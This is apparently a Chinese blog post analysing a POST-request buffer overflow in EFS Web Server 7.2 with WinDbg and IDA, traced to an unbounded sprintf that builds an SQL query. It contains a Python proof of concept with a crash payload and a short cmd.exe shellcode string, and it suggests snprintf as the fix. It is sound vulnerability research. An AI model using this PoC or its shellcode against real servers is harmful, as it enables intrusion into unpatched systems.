简介
看到这个软件,之前不是GET请求缓冲区溢出吗?
(附上我的分析链接:http://blog.csdn.net/u012763794/article/details/66970749)
这次有个POST,看看有没有新鲜的东西啊!
参考:https://www.exploit-db.com/exploits/42165/
实验环境
WinXP sp3 中文版
EFS Web Server7.2
windbg
IDA
mona
python 2.7
漏洞分析
修改exp为poc:
import httplib
server = "127.0.0.1"
#Shellcode Open CMD.exe
shellcode = (
"x8bxecx55x8bxec"
"x68x65x78x65x2F"
"x68x63x6dx64x2e"
"x8dx45xf8x50xb8"
"xc7x93xc2x77"
"xffxd0")
payload = "A" * 5000
# Server address and POrt
httpServ = httplib.HTTPConnection(server, 80)
httpServ.connect()
httpServ.request('POST', '/sendemail.ghp',
'Email=%s&getPassword=Get+Password' % payload)
response = httpServ.getresponse()
httpServ.close()
先复现一下:
0:005> g
(1110.1290): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=00000001 ecx=ffffffff edx=020561b8 esi=02056198 edi=020561b8
eip=61c277f6 esp=02056114 ebp=0205612c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:EFS SoftwareEasy File Sharing Web Serversqlite3.dll -
sqlite3!sqlite3_errcode+0x8e:
61c277f6 81784c97a629a0 cmp dword ptr [eax+4Ch],0A029A697h ds:0023:4141418d=????????
一看跟上次的位置一样呀,都是sqlite3!sqlite3_errcode+0x8e
看下栈信息
0:005> kv
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0205612c 61c6286c 000013ad 00001388 01568ea4 sqlite3!sqlite3_errcode+0x8e
*** WARNING: Unable to verify checksum for C:EFS SoftwareEasy File Sharing Web Serverfsws.exe
*** ERROR: Module load completed but symbols could not be loaded for C:EFS SoftwareEasy File Sharing Web Serverfsws.exe
0205616c 004968f4 00000001 00000000 02056198 sqlite3!sqlite3_declare_vtab+0x3282
0205618c 004975a3 020561b0 00000000 0012b9d0 fsws+0x968f4
00000000 00000000 00000000 00000000 00000000 fsws+0x975a3
跟上次好像差不多,直接在0049759E下断
0:002> bp 0049759E
*** WARNING: Unable to verify checksum for C:EFS SoftwareEasy File Sharing Web Serverfsws.exe
*** ERROR: Module load completed but symbols could not be loaded for C:EFS SoftwareEasy File Sharing Web Serverfsws.exe
0:002> bl
0 e 0049759e 0001 (0001) 0:**** fsws+0x9759e
0:002> g
ModLoad: 719c0000 719fe000 C:WINDOWSSystem32mswsock.dll
ModLoad: 76ef0000 76f17000 C:WINDOWSsystem32DNSAPI.dll
ModLoad: 76d30000 76d48000 C:WINDOWSsystem32iphlpapi.dll
ModLoad: 76f80000 76f88000 C:WINDOWSSystem32winrnr.dll
ModLoad: 76f90000 76f96000 C:WINDOWSsystem32
asadhlp.dll
ModLoad: 01a10000 01a20000 C:WINDOWSDBFilter.dll
ModLoad: 01a20000 01c4c000 C:WINDOWSSurfGd.dll
ModLoad: 60fd0000 61025000 C:WINDOWSsystem32hnetcfg.dll
ModLoad: 71a00000 71a08000 C:WINDOWSSystem32wshtcpip.dll
ModLoad: 5fdd0000 5fe24000 C:WINDOWSsystem32NETAPI32.DLL
ModLoad: 68000000 68036000 C:WINDOWSsystem32
saenh.dll
Breakpoint 0 hit
eax=020561b0 ebx=ffffff01 ecx=0205720c edx=020561b8 esi=0205720c edi=01568eec
eip=0049759e esp=02056194 ebp=00000068 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
fsws+0x9759e:
0049759e e82df3ffff call fsws+0x968d0 (004968d0)
0:005> kv
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
02056190 020561b0 020561b8 0012b9d0 02057624 fsws+0x9759e
02056194 020561b8 0012b9d0 02057624 ffffffff 0x20561b0
020561b0 01375910 656c6573 2a207463 6f726620 0x20561b8
00000000 00000000 00000000 00000000 00000000 0x1375910
0:005> dc 020561b0 l 100
020561b0 00000000 01375910 656c6573 2a207463 .....Y7.select *
020561c0 6f726620 7173206d 6261746c 7720656c from sqltable w
020561d0 65726568 616d6520 273d6c69 41414141 here email='AAAA
020561e0 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
020561f0 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
02056200 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
02056210 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
02056220 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
02056230 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
02056240 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
。。。。。。。。。
。。。。。。。。。
。。。。。。。。。
。。。。。。。。。
可以看到传给函数0049759E的第一个参数指向的值是一条sql语句,而且还很多我们传过来的AAAA。。。
那什么时候这里的栈被填成这样了呢,我们对020561e0下写入断点:
0:005> ba w4 020561e0
0:005> g
Breakpoint 0 hit
eax=00000041 ebx=00001383 ecx=02056160 edx=020561e0 esi=01568e69 edi=02056134
eip=00500df0 esp=02055ebc ebp=02055ebc iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
*** WARNING: Unable to verify checksum for C:EFS SoftwareEasy File Sharing Web Serverfsws.exe
*** ERROR: Module load completed but symbols could not be loaded for C:EFS SoftwareEasy File Sharing Web Serverfsws.exe
fsws+0x100df0:
00500df0 ff01 inc dword ptr [ecx] ds:0023:02056160=020561e0
果然一样的东西,这是write_char函数,上层应该是调用了sprintf函数什么的
到底是不是,我们继续追梦,看看栈先
0:005> kv
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
02055ebc 00500e69 00000041 02056160 02056134 fsws+0x100df0
02056148 004f9698 02056160 005a2859 0205619c fsws+0x100e69
02056180 0049758f 020561b8 005a283c 01374678 fsws+0xf9698
02056184 020561b8 005a283c 01374678 01374358 fsws+0x9758f
02056188 005a283c 01374678 01374358 01568e64 0x20561b8
020561b8 2a207463 6f726620 7173206d 6261746c fsws+0x1a283c
020561bc 6f726620 7173206d 6261746c 7720656c 0x2a207463
020561c0 7173206d 6261746c 7720656c 65726568 0x6f726620
020561c4 6261746c 7720656c 65726568 616d6520 0x7173206d
020561c8 7720656c 65726568 616d6520 273d6c69 0x6261746c
02056220 00000000 00000000 00000000 00000000 COMCTL32!CReBar::_WndProc+0x955 (FPO: [Non-Fpo])
ida看看004f9698 在哪,果然在sprintf里面,跟上次分析的一样的啊
.text:004F966A ; int sprintf(char *, const char *, ...)
.text:004F966A _sprintf proc near ; CODE XREF: sub_401520+36p
.text:004F966A ; sub_401B70+35p ...
.text:004F966A
.text:004F966A var_20 = FILE ptr -20h
.text:004F966A arg_0 = dword ptr 8
.text:004F966A arg_4 = dword ptr 0Ch
.text:004F966A arg_8 = dword ptr 10h
.text:004F966A
.text:004F966A push ebp
.text:004F966B mov ebp, esp
.text:004F966D sub esp, 20h
.text:004F9670 mov eax, [ebp+arg_0]
.text:004F9673 push esi
.text:004F9674 mov [ebp+var_20._base], eax
.text:004F9677 mov [ebp+var_20._ptr], eax
.text:004F967A lea eax, [ebp+arg_8]
.text:004F967D mov [ebp+var_20._flag], 42h
.text:004F9684 push eax ; int
.text:004F9685 lea eax, [ebp+var_20]
.text:004F9688 push [ebp+arg_4] ; int
.text:004F968B mov [ebp+var_20._cnt], 7FFFFFFFh
.text:004F9692 push eax ; FILE *
.text:004F9693 call sub_500640
.text:004F9698 add esp, 0Ch
.........
.........
.........
我们在调用sprintf前下断断点,查看第二个参数,格式化字符串,有3个%s,那第五个参数就是我们的email值:AAAAAA…..
0:005> bp 0049758A
*** WARNING: Unable to verify checksum for C:EFS SoftwareEasy File Sharing Web Serverfsws.exe
*** ERROR: Module load completed but symbols could not be loaded for C:EFS SoftwareEasy File Sharing Web Serverfsws.exe
0:005> g
Breakpoint 0 hit
eax=01374678 ebx=ffffff01 ecx=020561b8 edx=01374358 esi=0205720c edi=01568e64
eip=0049758a esp=02056188 ebp=00000068 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
fsws+0x9758a:
0049758a e8db200600 call fsws+0xf966a (004f966a)
0:005> dd esp
02056188 020561b8 005a283c 01374678 01374358
02056198 01568e64 0012b9d0 02057624 ffffffff
020561a8 01374678 01374358 00000000 01375910
020561b8 0000005c 656c6573 2a207463 6f726620
020561c8 7173206d 6261746c 0020656c 00000000
020561d8 00000000 00000000 00000000 00000000
020561e8 00000000 00000000 00000000 00000000
020561f8 00000000 00000000 00000000 00000000
0:005> dc 005a283c l8
005a283c 656c6573 2a207463 6f726620 7325206d select * from %s
005a284c 65687720 25206572 25273d73 00002773 where %s='%s'..
0:005> dc 01568e64
01568e64 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
01568e74 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
01568e84 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
01568e94 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
01568ea4 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
01568eb4 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
01568ec4 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
01568ed4 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
也可以看看第一二个参数是不是我们在崩溃前的eax指向的值看到的
0:005> dc 01374678 l2
01374678 746c7173 656c6261 sqltable
表确实是这个sqltable
虾米可看到字段也是email,注意下面有个00截断了的哦
0:005> dc 01374358 l2
01374358 69616d65 452d006c email.-E
漏洞利用
我这里已经讲了很多了
http://blog.csdn.net/u012763794/article/details/66970749
漏洞修复
使用安全的snprintf,或者对字符串长度进行限制
漏洞总结
通过这个温故,这个软件所有使用了sprintf函数的地方可能都有问题,只要你找到触发的方法就行了,漏洞利用都是大同小异
此外,漏洞利用无论是覆盖返回地址还是覆盖SEH都有一些坑,更多请看http://blog.csdn.net/u012763794/article/details/66970749漏洞利用部分内容。